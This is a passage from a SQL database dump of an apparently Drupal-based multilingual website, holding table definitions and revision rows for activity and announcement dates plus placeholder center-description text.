('activities', 0, 146, 592, 'en', 0, '2024-06-28T02:30:00'),
('activities', 0, 146, 592, 'ja', 0, '2024-06-28T02:30:00'),
('activities', 0, 146, 593, 'en', 0, '2024-06-28T02:30:00'),
('activities', 0, 146, 593, 'ja', 0, '2024-06-28T02:30:00'),
('activities', 0, 147, 594, 'en', 0, '2024-06-28T02:30:00'),
('activities', 0, 147, 595, 'en', 0, '2024-06-28T02:30:00'),
('activities', 0, 147, 595, 'ja', 0, '2024-06-28T02:30:00'),
('activities', 0, 148, 596, 'en', 0, '2024-07-02T02:30:00'),
('activities', 0, 148, 597, 'en', 0, '2024-07-02T02:30:00'),
('activities', 0, 148, 597, 'ja', 0, '2024-07-02T02:30:00'),
('activities', 0, 149, 598, 'en', 0, '2024-07-02T02:30:00'),
('activities', 0, 150, 599, 'en', 0, '2024-06-30T02:30:00'),
('activities', 0, 150, 600, 'en', 0, '2024-06-30T02:30:00'),
('activities', 0, 150, 600, 'ja', 0, '2024-06-30T02:30:00'),
('activities', 0, 151, 601, 'en', 0, '2024-07-04T02:30:00'),
('activities', 0, 151, 602, 'en', 0, '2024-07-04T02:30:00'),
('activities', 0, 151, 602, 'ja', 0, '2024-07-04T02:30:00'),
('activities', 0, 152, 603, 'en', 0, '2024-07-04T04:00:00'),
('activities', 0, 152, 604, 'en', 0, '2024-07-04T04:00:00'),
('activities', 0, 152, 604, 'ja', 0, '2024-07-04T04:00:00'),
('activities', 0, 153, 605, 'en', 0, '2024-07-08T02:30:00'),
('activities', 0, 153, 606, 'en', 0, '2024-07-08T02:30:00'),
('activities', 0, 153, 606, 'ja', 0, '2024-07-08T02:30:00'),
('activities', 0, 154, 607, 'en', 0, '2026-06-14T03:06:33'),
('activities', 0, 154, 608, 'en', 0, '2026-06-14T03:06:33'),
('activities', 0, 154, 608, 'ja', 0, '2026-06-14T03:06:33'),
('activities', 0, 154, 609, 'en', 0, '2026-06-14T03:06:33'),
('activities', 0, 154, 609, 'ja', 0, '2026-06-14T03:06:33'),
('activities', 0, 156, 612, 'en', 0, '2026-04-21T02:30:35'),
('activities', 0, 156, 613, 'en', 0, '2026-04-21T02:30:35'),
('activities', 0, 156, 613, 'ja', 0, '2026-04-21T02:30:35'),
('activities', 0, 157, 614, 'ja', 0, '2026-04-26T02:38:08'),
('activities', 0, 157, 615, 'en', 0, '2026-04-26T02:38:08'),
('activities', 0, 157, 615, 'ja', 0, '2026-04-26T02:38:08'),
('activities', 0, 160, 620, 'en', 0, '2026-03-02T03:29:03'),
('activities', 0, 160, 621, 'en', 0, '2026-03-02T03:29:03'),
('activities', 0, 160, 621, 'ja', 0, '2026-03-02T03:29:03'),
('activities', 0, 160, 660, 'en', 0, '2026-03-02T03:29:03'),
('activities', 0, 160, 660, 'ja', 0, '2026-03-02T03:29:03'),
('activities', 0, 161, 622, 'ja', 0, '2026-02-03T02:32:13'),
('activities', 0, 161, 623, 'en', 0, '2026-02-03T02:32:13'),
('activities', 0, 161, 623, 'ja', 0, '2026-02-03T02:32:13'),
('activities', 0, 161, 657, 'en', 0, '2026-02-03T02:32:13'),
('activities', 0, 161, 657, 'ja', 0, '2026-02-03T02:32:13'),
('activities', 0, 161, 658, 'en', 0, '2026-02-03T02:32:13'),
('activities', 0, 161, 658, 'ja', 0, '2026-02-03T02:32:13'),
('activities', 0, 161, 659, 'en', 0, '2026-02-03T02:32:13'),
('activities', 0, 161, 659, 'ja', 0, '2026-02-03T02:32:13'),
('activities', 0, 165, 630, 'en', 0, '2026-06-03T03:26:57'),
('activities', 0, 165, 631, 'en', 0, '2026-06-03T03:26:57'),
('activities', 0, 165, 631, 'ja', 0, '2026-06-03T03:26:57'),
('activities', 0, 166, 632, 'ja', 0, '2026-05-20T02:37:33'),
('activities', 0, 166, 633, 'en', 0, '2026-05-20T02:37:33'),
('activities', 0, 166, 634, 'en', 0, '2026-05-20T02:37:33'),
('activities', 0, 166, 634, 'ja', 0, '2026-05-20T02:37:33'),
('activities', 0, 167, 635, 'en', 0, '2026-04-23T02:42:11'),
('activities', 0, 167, 636, 'en', 0, '2026-04-23T02:42:11'),
('activities', 0, 167, 636, 'ja', 0, '2026-04-23T02:42:11'),
('activities', 0, 168, 637, 'en', 0, '2026-05-20T02:45:35'),
('activities', 0, 168, 638, 'en', 0, '2026-05-20T02:45:35'),
('activities', 0, 168, 638, 'ja', 0, '2026-05-20T02:45:35'),
('activities', 0, 169, 639, 'en', 0, '2026-05-10T02:51:29'),
('activities', 0, 169, 640, 'en', 0, '2026-05-10T02:51:29'),
('activities', 0, 169, 640, 'ja', 0, '2026-05-10T02:51:29'),
('activities', 0, 170, 641, 'en', 0, '2026-05-02T03:13:00'),
('activities', 0, 170, 642, 'en', 0, '2026-05-02T03:13:00'),
('activities', 0, 170, 642, 'ja', 0, '2026-05-02T03:13:00'),
('activities', 0, 171, 643, 'en', 0, '2026-04-26T03:18:51'),
('activities', 0, 171, 644, 'en', 0, '2026-04-26T03:18:51'),
('activities', 0, 171, 644, 'ja', 0, '2026-04-26T03:18:51'),
('activities', 0, 173, 647, 'en', 0, '2026-04-22T02:41:09'),
('activities', 0, 173, 648, 'en', 0, '2026-04-22T02:41:09'),
('activities', 0, 173, 648, 'ja', 0, '2026-04-22T02:41:09'),
('activities', 0, 174, 649, 'en', 0, '2026-04-01T02:45:23'),
('activities', 0, 174, 650, 'en', 0, '2026-04-01T02:45:23'),
('activities', 0, 174, 650, 'ja', 0, '2026-04-01T02:45:23'),
('activities', 0, 175, 651, 'en', 0, '2026-03-29T02:50:53'),
('activities', 0, 175, 652, 'en', 0, '2026-03-29T02:50:53'),
('activities', 0, 175, 652, 'ja', 0, '2026-03-29T02:50:53'),
('activities', 0, 176, 653, 'en', 0, '2026-03-05T02:59:46'),
('activities', 0, 176, 654, 'en', 0, '2026-03-05T02:59:46'),
('activities', 0, 176, 654, 'ja', 0, '2026-03-05T02:59:46'),
('activities', 0, 177, 655, 'en', 0, '2026-02-12T03:11:34'),
('activities', 0, 177, 656, 'en', 0, '2026-02-12T03:11:34'),
('activities', 0, 177, 656, 'ja', 0, '2026-02-12T03:11:34'),
('activities', 0, 178, 661, 'en', 0, '2026-05-02T03:23:32'),
('activities', 0, 178, 662, 'en', 0, '2026-05-02T03:23:32'),
('activities', 0, 178, 662, 'ja', 0, '2026-05-02T03:23:32'),
('activities', 0, 179, 663, 'en', 0, '2026-02-03T02:53:12'),
('activities', 0, 179, 664, 'en', 0, '2026-02-03T02:53:12'),
('activities', 0, 179, 664, 'ja', 0, '2026-02-03T02:53:12'),
('activities', 0, 180, 665, 'ja', 0, '2026-02-03T02:55:33'),
('activities', 0, 180, 666, 'en', 0, '2026-02-03T02:55:33'),
('activities', 0, 180, 667, 'en', 0, '2026-02-03T02:55:33'),
('activities', 0, 180, 667, 'ja', 0, '2026-02-03T02:55:33'),
('activities', 0, 181, 668, 'en', 0, '2026-01-30T02:59:01'),
('activities', 0, 181, 669, 'en', 0, '2026-01-30T02:59:01'),
('activities', 0, 181, 669, 'ja', 0, '2026-01-30T02:59:01'),
('activities', 0, 182, 670, 'en', 0, '2026-01-30T03:02:28'),
('activities', 0, 182, 671, 'en', 0, '2026-01-30T03:02:28'),
('activities', 0, 182, 671, 'ja', 0, '2026-01-30T03:02:28'),
('activities', 0, 183, 672, 'en', 0, '2026-01-30T03:04:54'),
('activities', 0, 183, 673, 'en', 0, '2026-01-30T03:04:54'),
('activities', 0, 183, 673, 'ja', 0, '2026-01-30T03:04:54'),
('activities', 0, 184, 674, 'en', 0, '2026-01-26T03:08:44'),
('activities', 0, 184, 675, 'en', 0, '2026-01-26T03:08:44'),
('activities', 0, 184, 675, 'ja', 0, '2026-01-26T03:08:44'),
('activities', 0, 185, 676, 'en', 0, '2026-01-24T03:13:06'),
('activities', 0, 185, 677, 'en', 0, '2026-01-24T03:13:06'),
('activities', 0, 185, 678, 'en', 0, '2026-01-24T03:13:06'),
('activities', 0, 185, 678, 'ja', 0, '2026-01-24T03:13:06'),
('activities', 0, 186, 679, 'en', 0, '2026-01-24T03:16:45'),
('activities', 0, 186, 680, 'en', 0, '2026-01-24T03:16:45'),
('activities', 0, 186, 680, 'ja', 0, '2026-01-24T03:16:45'),
('activities', 0, 187, 681, 'en', 0, '2026-01-24T02:58:11'),
('activities', 0, 187, 682, 'en', 0, '2026-01-24T02:58:11'),
('activities', 0, 187, 682, 'ja', 0, '2026-01-24T02:58:11'),
('activities', 0, 188, 683, 'en', 0, '2026-01-22T03:23:25'),
('activities', 0, 188, 684, 'en', 0, '2026-01-22T03:23:25'),
('activities', 0, 188, 684, 'ja', 0, '2026-01-22T03:23:25'),
('activities', 0, 189, 685, 'en', 0, '2026-01-22T02:32:11'),
('activities', 0, 189, 686, 'en', 0, '2026-01-22T02:32:11'),
('activities', 0, 189, 686, 'ja', 0, '2026-01-22T02:32:11'),
('activities', 0, 190, 689, 'en', 0, '2026-01-22T03:10:53'),
('activities', 0, 191, 690, 'en', 0, '2026-01-22T03:12:07'),
('activities', 0, 191, 691, 'en', 0, '2026-01-22T03:12:07'),
('activities', 0, 191, 691, 'ja', 0, '2026-01-22T03:12:07'),
('activities', 0, 192, 692, 'en', 0, '2026-01-21T03:15:03'),
('activities', 0, 192, 693, 'en', 0, '2026-01-21T03:15:03'),
('activities', 0, 192, 693, 'ja', 0, '2026-01-21T03:15:03'),
('activities', 0, 193, 694, 'en', 0, '2026-01-21T03:18:18'),
('activities', 0, 193, 695, 'en', 0, '2026-01-21T03:18:18'),
('activities', 0, 193, 695, 'ja', 0, '2026-01-21T03:18:18'),
('activities', 0, 193, 696, 'en', 0, '2026-01-21T03:18:18'),
('activities', 0, 193, 696, 'ja', 0, '2026-01-21T03:18:18'),
('activities', 0, 194, 697, 'en', 0, '2026-01-21T03:26:17'),
('activities', 0, 194, 698, 'en', 0, '2026-01-21T03:26:17'),
('activities', 0, 194, 698, 'ja', 0, '2026-01-21T03:26:17'),
('activities', 0, 195, 699, 'en', 0, '2026-01-21T02:31:50'),
('activities', 0, 195, 700, 'en', 0, '2026-01-21T02:31:50'),
('activities', 0, 195, 700, 'ja', 0, '2026-01-21T02:31:50'),
('activities', 0, 196, 701, 'en', 0, '2026-01-21T02:34:41'),
('activities', 0, 196, 702, 'en', 0, '2026-01-21T02:34:41'),
('activities', 0, 196, 702, 'ja', 0, '2026-01-21T02:34:41'),
('activities', 0, 197, 703, 'en', 0, '2026-01-19T02:47:14'),
('activities', 0, 197, 704, 'en', 0, '2026-01-19T02:47:14'),
('activities', 0, 197, 704, 'ja', 0, '2026-01-19T02:47:14'),
('activities', 0, 198, 705, 'en', 0, '2026-01-19T02:53:39'),
('activities', 0, 198, 706, 'en', 0, '2026-01-19T02:53:39'),
('activities', 0, 198, 706, 'ja', 0, '2026-01-19T02:53:39'),
('activities', 0, 199, 707, 'en', 0, '2026-01-19T02:59:40'),
('activities', 0, 199, 708, 'en', 0, '2026-01-19T02:59:40'),
('activities', 0, 199, 708, 'ja', 0, '2026-01-19T02:59:40'),
('activities', 0, 200, 709, 'en', 0, '2026-01-19T03:02:51'),
('activities', 0, 200, 710, 'en', 0, '2026-01-19T03:02:51'),
('activities', 0, 200, 710, 'ja', 0, '2026-01-19T03:02:51');

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_announce_post_date`
--

CREATE TABLE `node_revision__field_announce_post_date` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_announce_post_date_value` varchar(20) NOT NULL COMMENT 'The date value.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field field_announce_post…';

--
-- Dumping data for table `node_revision__field_announce_post_date`
--

INSERT INTO `node_revision__field_announce_post_date` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_announce_post_date_value`) VALUES
('announcement', 0, 3, 6, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 9, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 38, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 41, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 80, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 81, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 82, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 133, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 133, 'ja', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 136, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 136, 'ja', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 136, 'ko', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 213, 'en', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 213, 'ja', 0, '2023-06-20T05:16:05'),
('announcement', 0, 3, 213, 'ko', 0, '2023-06-20T05:16:05'),
('announcement', 0, 4, 7, 'en', 0, '2023-06-21T05:18:32'),
('announcement', 0, 4, 8, 'en', 0, '2023-06-21T05:18:32'),
('announcement', 0, 4, 30, 'en', 0, '2023-06-21T05:18:32'),
('announcement', 0, 4, 31, 'en', 0, '2023-06-21T05:18:32'),
('announcement', 0, 4, 32, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 39, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 40, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 49, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 75, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 131, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 131, 'ja', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 134, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 134, 'ja', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 134, 'ko', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 204, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 204, 'ja', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 204, 'ko', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 208, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 208, 'ja', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 208, 'ko', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 209, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 209, 'ja', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 209, 'ko', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 210, 'en', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 210, 'ja', 0, '2023-06-22T05:18:32'),
('announcement', 0, 4, 210, 'ko', 0, '2023-06-22T05:18:32'),
('announcement', 0, 5, 10, 'en', 0, '2023-06-30T05:21:28'),
('announcement', 0, 5, 22, 'en', 0, '2023-06-30T05:21:28'),
('announcement', 0, 5, 25, 'en', 0, '2023-06-30T05:21:28'),
('announcement', 0, 5, 26, 'en', 0, '2023-06-30T05:21:28'),
('announcement', 0, 5, 28, 'en', 0, '2023-06-30T05:21:28'),
('announcement', 0, 5, 37, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 42, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 76, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 77, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 78, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 132, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 132, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 135, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 135, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 135, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 212, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 212, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 212, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 315, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 315, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 315, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 318, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 318, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 318, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 319, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 319, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 319, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 322, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 322, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 322, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 323, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 323, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 324, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 324, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 324, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 325, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 325, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 325, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 326, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 326, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 326, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 340, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 340, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 340, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 359, 'en', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 359, 'ja', 0, '2023-06-21T05:21:28'),
('announcement', 0, 5, 359, 'ko', 0, '2023-06-21T05:21:28'),
('announcement', 0, 10, 16, 'en', 0, '2023-07-01T12:57:26'),
('announcement', 0, 10, 29, 'en', 0, '2023-07-01T12:57:26'),
('announcement', 0, 10, 35, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 36, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 43, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 72, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 127, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 127, 'ja', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 129, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 129, 'ja', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 129, 'ko', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 211, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 211, 'ja', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 211, 'ko', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 316, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 316, 'ja', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 316, 'ko', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 321, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 321, 'ja', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 321, 'ko', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 339, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 339, 'ja', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 339, 'ko', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 358, 'en', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 358, 'ja', 0, '2023-06-21T12:57:26'),
('announcement', 0, 10, 358, 'ko', 0, '2023-06-21T12:57:26'),
('announcement', 0, 18, 59, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 60, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 61, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 71, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 73, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 74, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 128, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 128, 'ja', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 130, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 130, 'ja', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 130, 'ko', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 207, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 207, 'ja', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 207, 'ko', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 317, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 317, 'ja', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 317, 'ko', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 320, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 320, 'ja', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 320, 'ko', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 336, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 336, 'ja', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 336, 'ko', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 337, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 337, 'ja', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 337, 'ko', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 338, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 338, 'ja', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 338, 'ko', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 357, 'en', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 357, 'ja', 0, '2023-06-23T03:19:15'),
('announcement', 0, 18, 357, 'ko', 0, '2023-06-23T03:19:15'),
('announcement', 0, 30, 224, 'en', 0, '2023-07-09T03:29:30'),
('announcement', 0, 30, 225, 'en', 0, '2023-07-09T03:29:30'),
('announcement', 0, 30, 225, 'ja', 0, '2023-07-09T03:29:30'),
('announcement', 0, 30, 226, 'en', 0, '2023-07-09T03:29:30'),
('announcement', 0, 30, 226, 'ja', 0, '2023-07-09T03:29:30'),
('announcement', 0, 30, 226, 'ko', 0, '2023-07-09T03:29:30'),
('announcement', 0, 31, 257, 'en', 0, '2023-07-21T03:25:47'),
('announcement', 0, 31, 258, 'en', 0, '2023-07-21T03:25:47'),
('announcement', 0, 31, 259, 'en', 0, '2023-07-21T03:25:47'),
('announcement', 0, 62, 378, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 382, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 383, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 392, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 392, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 395, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 395, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 396, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 396, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 397, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 397, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 398, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 398, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 399, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 399, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 400, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 400, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 401, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 401, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 402, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 402, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 403, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 403, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 404, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 404, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 405, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 405, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 406, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 406, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 407, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 407, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 408, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 408, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 409, 'en', 0, '2023-08-25T03:13:44'),
('announcement', 0, 62, 409, 'ja', 0, '2023-08-25T03:13:44'),
('announcement', 0, 66, 420, 'en', 0, '2024-02-06T04:43:44'),
('announcement', 0, 155, 610, 'en', 0, '2026-06-14T03:29:57'),
('announcement', 0, 155, 611, 'en', 0, '2026-06-14T03:29:57'),
('announcement', 0, 155, 611, 'ja', 0, '2026-06-14T03:29:57'),
('announcement', 0, 162, 624, 'en', 0, '2026-06-17T02:59:33'),
('announcement', 0, 162, 625, 'en', 0, '2026-06-17T02:59:33'),
('announcement', 0, 162, 625, 'ja', 0, '2026-06-17T02:59:33'),
('announcement', 0, 163, 626, 'en', 0, '2026-06-16T03:06:09'),
('announcement', 0, 163, 627, 'en', 0, '2026-06-16T03:06:09'),
('announcement', 0, 163, 627, 'ja', 0, '2026-06-16T03:06:09');

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_center_description`
--

CREATE TABLE `node_revision__field_center_description` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_center_description_value` longtext NOT NULL,
  `field_center_description_summary` longtext,
  `field_center_description_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='Revision archive storage for node field field_center…';

--
-- Dumping data for table `node_revision__field_center_description`
--

INSERT INTO `node_revision__field_center_description` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_center_description_value`, `field_center_description_summary`, `field_center_description_format`) VALUES
('language_center', 0, 204, 715, 'ja', 0, '<p>he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</p>', '', 'basic_html'),
('language_center', 0, 204, 716, 'ja', 0, '<p>he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</p>', '', 'basic_html'),
('language_center', 0, 204, 719, 'ja', 0, '<p>he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</p>', '', 'basic_html'),
('language_center', 0, 204, 720, 'ja', 0, '<p>he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</p>', '', 'basic_html'),
